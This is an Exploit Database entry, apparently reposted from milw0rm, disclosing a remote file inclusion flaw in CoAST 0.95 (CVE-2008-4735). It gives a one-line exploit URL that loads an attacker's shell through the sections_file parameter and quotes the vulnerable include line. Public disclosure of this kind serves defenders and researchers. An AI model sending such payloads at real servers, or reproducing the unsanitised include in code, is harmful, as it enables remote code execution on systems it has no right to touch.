Exploit Database - Logo

CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion

EDB-ID: 6598 Author: DaRkLiFe Published: 2008-09-27
CVE: CVE-2008-4735 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
**************************************************************************************

Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.

**************************************************************************************
Script   : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability

Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?


**************************************************************************************

The header.php.dist file exists and it has to be   renamed into header.php as given in instructions.

Vulberable : line 201 : <?php @include $sections_file; ?>

**************************************************************************************

THANKS ! GREETZ ! 
**************************************************************************************

# milw0rm.com [2008-09-27]

Related Exploits

Trying to match CVEs (1): CVE-2008-4735
Trying to match OSVDBs (1): 48614
Trying to match setup file: 8023edb5b97113abd28855d05fca09a4
Other Possible E-DB Search Terms: CoAST 0.95,  CoAST
Date D V Title Author
No matches
Menu